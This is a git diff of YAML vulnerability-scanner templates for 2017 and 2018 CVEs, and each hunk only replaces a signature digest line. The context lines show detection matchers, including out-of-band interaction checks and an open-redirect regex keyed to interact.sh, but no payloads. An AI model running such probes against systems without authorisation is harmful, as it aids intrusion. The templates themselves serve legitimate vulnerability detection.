b/http/cves/2017/CVE-2017-9140.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0ae3cee6c032779188defaba13ba515900432974163523509b991be8eb3bbe6022044aaab25b4230a8a91fd5f434ae326ca2b94cde43bf07ffffb32b94a7125bb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 892a6db7fc..42a93b198d 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -54,4 +54,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ae1062b4d18e3bae8f1c1d9f3200e04c5d570c18548cb5416cca0a21ff2784d022017b86827595b36926951acc817a2da6dad10db2aeaf57e2bb88093764f8b572b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 51f30bafe7..156f658c9b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058eadfb6c31de91652d2e3f2bbe583e23f200f085f6ce06d3612e9a68a41ba30022041068697a3cca76eacdb62a255ad06cd291e017b9ded3cb927ff3024ff4be806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 32d5c459cc..e14b2a5a9c 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d5e3820e512db011373ede9813749ce666b0b1030e3bafb75a433c8f747058d022100a71caf04a60f079184c23f7c442ca72d1e8642ac385157ab9944830e92448b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220654157dcb293d2d08454e1fb3aefe554654d48c0a62a31599bc162c7336a57d40221009f20fb2092c4f824918490ed55aa5eba154e0c9e2b3eab3ca83ebe97265d8de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 79c018c149..a1ac4bdffd 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -111,4 +111,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220122ca0a4f8e33eeadad533cea05bacbd79424b517cf01d019b6050fa9ab39fec022100c82eae0d2f07bab6718f05e23d1d487229f6ec694b7af767f8f22d19898e4c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 36f50d8c22..58cae6aff8 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009be35f84b58a3b2534536d4717801b75f2f9cec7a15b7a50ddab4fa986660d9e022100f6a7a8f7f29cd485e81d17ed1b9b3fb1ce3f3be143c79087b917bd4abd3c0a57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 8673537ca0..2f6561f1b3 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100becb5b5f455cc2352342a916d40b8b3e767f4bb590ec0663ab0c43a8209036aa02207064fc85e40379fbe38b9715412a026a67a8c3556926dec684adb5320f215f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index aa8a60026f..2ee61183cf 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e232f0baa386a961ae8b970d4e146a2cc11ceb1732f26c2ef20295955e73a350022100baa328e6e710e562eb6cfa8e6f546f7d5da7d2d218cc08f888d389993d3211a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b1c0946541693aca213fa88998f586c3530aee37c8ff6124163eb7cf846ab2f022100d71414aeee0ed44f7cc4620c564f10d312e85bd7fb2e8335d1d804b84c955c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 9eb219e168..796752264f 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d13910ea51e10912ef8a7920f88602a7c375f607fd520c36d87b3e87222226ca02205885520f34c9569d052fafa49195b92d66c1d535316bea0686be5d5a582f3365:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index ae606c2ab8..d3c30ba92a 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206994805bfe4800c98a7123de3e07dd8d4eb8acd1a998e52f4e5f4358b9f56dc502205ed9dfc8fc39f4989d9c2cd237d55365ba24b29b63e822461ec17bb65c97a7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 9467c33124..c3245382d1 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079634a20486dcf525b9d3cb71443762cdac4111b39fe9a6b3449dda9a8e890cc0220445f87f41680fdda13d31abfc6f3e0f0d50d4d2ea8bde289aedb0581313f4c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 6295efc437..30a24812d5 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -56,4 +56,4 @@ http: - '<span class="name">(.*?)</span>' internal: true part: body -# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f81ce3e13f27d57d6da8c69097e3f825ffe0487277515de76774c7a7694b022022100b7b600dafbc5c43e69246a4f582585a5384579f5a124b72709f0d7e74b67413f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index c310e25cba..9f8cdce89d 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1b62b106b4c21342cb736b6e6a4348d2c7b41af9e60f58f06fb0a29d49e4df90221008faeb72dc507eae9f337d9244ac1b75c355da72c479a31bd223d05a0e2e564f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 25fb539b3d..7d3091378f 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d90ae1fac1b0db54f1d7a8e1f3eef2eb844417c05891f1804fb128088eb1d00022066c3f64a9240b442390e30adbf000b7b79f88529a42d94fdc60527fb2e78324a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 0506efb3c4..276a69b40d 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b7546d4dccd4fa181fa09bb83e081a6989aead24521c6c0d70f5248899b2a45022100d4022a0e7bcef44ef127c8b6ff5c4b665921acb82e9765f06abe40226f8969a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 49e2dd760f..0a5d6fdb63 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd38808d0d82c779bd0f9e6a95178a5ba15d9077aea8c861a459efcf42e0a10f022078e07f6c8c953b1fa0e4e74b9571886fce453b537e3a95cd9e23bbcb95b8d798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index c97ede9e94..5aeda05166 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dfe914a909bd06826c5f95c78f072ebc7a003232260c8a72a600053849785ff0220190ab47deef14444724b423984e4a4b3555fda14bdbb101a1f79e98589c2b5f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 21be97774f..80d1969d83 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076907511f4f625fb84a997087590fa36dac01d612d1802c6b579d54c508c623e02203ef2be0b835b4c686a29db3a4afcd4875d69783fc68a917690ddb802c2401758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index 44a4f42524..c9d9f40976 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -39,4 +39,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c92d03da546dfaff637d87978a98fca7e7ad2a8730f1c69d01d1efe4d0a1553022100aa1ee875fe25ce4048f056bec89e298da5b0b1693920c7496c86380672682886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index 54c31f2c3a..40290d66e0 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -40,4 +40,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd7e0f3fb866e6dbe44663017c33c95074875d8b777ee60e7589bdf239c9fda902203633af43f63f2beca4ba88660112dcdba36ad173ba8fcf87ab43b88a71d0f6be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index c2fcae1645..476167d0e2 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -43,4 +43,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f133a4099b185a18cfefaa3ceb1a63edcd4505b939310fbe976681c8e6d0e80022100fdc8e91e5b09fe096ee74cd86983878a072ed1e682531d6b936180afec270de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index 13be4d6826..c8ebb8e65a 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -42,4 +42,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032ff5ae76fd4bafea18400182ea5d3e6b9e5917a60778bb68121d7724dd9a6eb022100cf064e5aaa2db867e5dd696a41135a985be141a222970604ad3f887173ec0db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 33c77bad43..5a5b5ef2e9 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c3b74b5fd566685fbad5b11a5f88f2cbbaeb6a44476e6e1a11c8846c395474c022026262baad879004dfb8e0433aa4206ea581bcd723c00763109d0eba3f5af5e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202dd28b31608a43a3c4493267bee160bb0604051c8b413fceb611ee5bf2f78a560221009055db2ddb25f781a71fc23746b17aca5f10baf45be8f347f20ef73c917bfbca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 8c69a4a890..439df260bd 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -75,4 +75,4 @@ http: group: 1 regex: - '(.*?)\|\|\|\|' -# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5c0be9fdc84b3fd3d3c130d309b587ec77fd52be876838eddbba234cc28e715022100b42d341387c2ef8750f784db06da3e27e35d0cff6d77ae88c43ea4725c1ca3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 7b8a92335a..0bef67a5c0 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002c0da9e8011d65dab80c630bf30cb61029cb0fc68d1a0b5b7de1f11b65ba50b022100d10b2577aae04e1cb2447339fb423e147328096fafe2e7dfa63a3c87b876f4d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 556ee22841..efc806c9f4 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9e55724df8749ace8f579f6c441325aed843527785b06dc7575d60426297d970220098c8c73fed3d1499735eb40da07fabb36db006d2d8ecb643cb55996bc35aa28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 27054a7f07..ccdd6b9943 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b713a4f66f9d5d0e0c1621cb4d7346a8391dfcb9840a579aaf892c3aa5d3b62102210084e5a59025b33e6a132de272f100fa98b4e5478c6ffc88166ad534afe06b9d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf46cae11d86cd1de5f9dadb6eaacc3a59275c483617d1b09f441671815032620220701cf5a3bee3b755f16c7a9cd42976913debedf9914a004e5acc5ab96c9820ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index bffafebce3..c2cf62f4c7 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -71,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036c1c6320032b7d766da8547f80ca65da333066602f3c266752775429737766e022100df63b38dfd53ec3807a099db7b983469085a94bc866637ce7a4da3a1f8c7137a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index c2e50ddc0d..4975a82ea5 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207421366c244f2a469b78e683d33433ea6d7c8268abf6e0e8090bbfb449d240d202203fdb385d1e1838f118286e940d02d935d99b18bc9ab0657fd3edcf1210203932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 525db1a5fc..2b8a43c127 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100938ac8228345eddd038c98eda80c1dd2c91c011b112fd03901c57fa214b320ae02210087ae996c5447b94a35b1756c4b5fa32348fcb342d1182163594151eac3b250b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 3d29a731da..7989de9eaa 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eaabc7db1807fc929001ebb7e618de3e40c1278290fd8ebf70728eb103cf8c2402203e66b8cb08ccd31c52735f7647ad71582aa2bf25aa797c7fd2c1b7387c995f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 0a78bab8e9..fd94e8bf70 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -49,4 +49,4 @@ http: negative: true status: - 404 -# digest: 4a0a00473045022056187efc1263a71f2d8b32f9de3c5f204e1f0e14a74e5c6414adcc71e2baef0f022100c535f4d342896061392e41c1198b95e62d3934b01628ac2a8a8bfdd16547d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ede843a93cd7c543ab76b7e16334cef004e6cb38d973d677b0e973ca732b6d0c022059ab20c40bda233e9cbcb62f029375e1ab0ab8d446fb593bd171dac749c4cb48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 44a17c7f65..20be64b068 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa5f6c95e56ff7e46e8bb58d0cf8c30e0a6788c3a1378618619c2e0a8c7ae11902201bd725976214247dc0fecb41fc5b6e3213a728cbee903a11d4945a7de4f4404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index abb34c7602..e029096e0d 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -51,4 +51,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eea6124ab2717f89f34103874e7c2f3d232178d78b14c8c4c93c2358076dd57702207a7f9ab3aae93592eb2adfbd00c2e38e3632f23fa3aed618d162a876c7ce255b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 4dc0fdc60e..2a6238d209 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009dfce0d02b5695b72b5abb8cf9079405d12ade3adcfc1c5bb25e4b725d8926ee02202fa0abf4ea932a109e72c5a67f552de24aa8c6fe91c634debed351d5be5d2e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index deeaed9bcc..359bdefacf 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009efa0514463053230c63b5f90705314d9e80a1a472ea48bb9da85b5c9779ee6402206c0ec7976f0ef1416debde9235f1b2a274324bd6782667980cd9288d6c90b06b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b44e1f59ab1d35b1079bbeecba8fabbcc3d662db03dd9feebe186ea1526671f022100c1cd55fbb8aae22f862d0894cf82b08ecdbd72d84263a165885987f10d83a5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 0789ff6ee6..0c32cd9593 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ 